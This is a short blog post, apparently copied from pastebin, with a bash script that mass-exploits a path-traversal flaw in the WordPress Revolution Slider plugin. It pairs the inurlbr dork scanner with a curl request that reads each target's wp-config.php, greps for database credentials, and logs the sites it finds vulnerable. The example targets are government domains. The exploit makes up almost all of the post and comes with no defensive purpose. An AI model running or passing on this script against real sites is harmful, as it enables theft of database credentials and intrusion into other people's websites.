Pages

Tuesday, 26 May 2015

Wordpress Revolution Slider

    #!/bin/bash
    # EXPLOIT COMPLEMENTO SCANNER INURLBR:
    # ./inurlbr.php --dork 'admin-ajax.php?action=revolution'  -s revolution.txt -q 1,6 [...]
    #  --comand-all 'bash script.sh "http://_TARGET_" "/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php"'
     
    # Exemple: bash script.sh http://target.br you_exploit
    # Exec:    bash script.sh http://target.gov.br '/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
     
    curl -s "$1$2" | grep 'DB_' > /dev/null && echo "[+] $1$2" | tee -a /output/wp-out-curl.txt || echo not vuln;
     
    sumber:pastebin

1 comment: